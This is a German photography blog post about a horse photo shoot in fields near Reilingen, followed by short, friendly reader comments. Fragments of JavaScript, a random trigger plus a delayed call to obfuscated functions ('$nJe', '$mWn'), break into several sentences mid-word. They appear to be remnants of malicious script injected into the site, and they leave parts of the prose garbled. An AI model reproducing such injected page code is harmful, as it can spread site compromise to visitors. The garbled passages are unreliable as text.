Sommer- / Winterpause

Ihr Lieben,

aktuell kann ich aus Kapazitätsgründen keine Hochzeiten oder Shootings annehmen.


Eure,
Olivia

Olivia Di Stefano Photography

Shooting mit Phönix – Pferdeshooting | Felder Reilingen

Die Planung eines Shootings mit Domiynka vom Beauty Corner in Hockenheim stdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and schon seit längerem auf meiner To-Do Liste. Und als wir beide zufällig letzten Samstag frei und Zeit hatten war es endlich soweit! Dominyka hatte eine Idee im Kopf mit Pferd und dank Chiara und ihrer Familie wurde dieser Traum für Dominyka war (1000 Dank an alle). Phönix war unser Shootingpartner, ein sehr schönes Pferd, schön zurecht gemacht und neu eingefettet machten wir uns auf den Weg ins nah gelegene Feld in Reilingen. Ich muss schon zugeben, dass ich einen heiden Respekt vor Pferden haben. Es sind wunderschöne Geschöpfe und ich bin froh, dass ich die Chance hatte, solch ein Shooting zu fodom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografieren. An dieser Stelle sei gesagt, dass bereits am Wochenende ein weiteres Shooting stattfinden wird und ich bin jetzt schon sehr gespannt :). Auch noch einmal möchte ich mich bei Chiaras Eltern bedanken, für die Unterstützung vor Ort und die Erfischungen!

Einen großen Dank an Chiara, die dieses Shooting ermöglicht hat:Outtakes:

6 Kommentare
Schreibe einen Kommentar...

DANKE für euren Besuch und die lieben Worte. Gekennzeichnete Felder bitte ausfüllen. *

  • Steffi R.25/07/2013 - 13:59

    WOW kann ich da nur sagen liebe olivia ♥
    das pferd, deine models, die location und die farben ♥
    ich bin hin und weg. mach weiter so!!! es macht spaß bei dir vorbeizuschauen :) . liebe grüße steffiAntwortenCancel

  • Dominika...(die kleine von madi)25/07/2013 - 13:28

    voll schön die Bilder sind sehr schön lg DomiAntwortenCancel

  • Denise Dreßler25/07/2013 - 13:13

    Wunderschöne Bilder. Ein Pferdeshooting würde ich persönlich auch gerne mal durchführen, allerdings als Fotografin. ;)

    Ich bin gespannt auf die nächsten Bilder. Du machst einen echt tollen Job. :)AntwortenCancel

  • Madeleine^^ (die Kleine von domi)25/07/2013 - 10:14

    Die Fotos sind echt TOLL gewordenAntwortenCancel

  • Monique25/07/2013 - 08:13

    traumhaft schöne Bilder!!!AntwortenCancel

  • Dominyka25/07/2013 - 08:11

    Ich muss mich auch bei allen Beteiligten bedanken. Es war ein tolles Erlebnis und es sind umwerfende Bilder entstanden.AntwortenCancel

Menu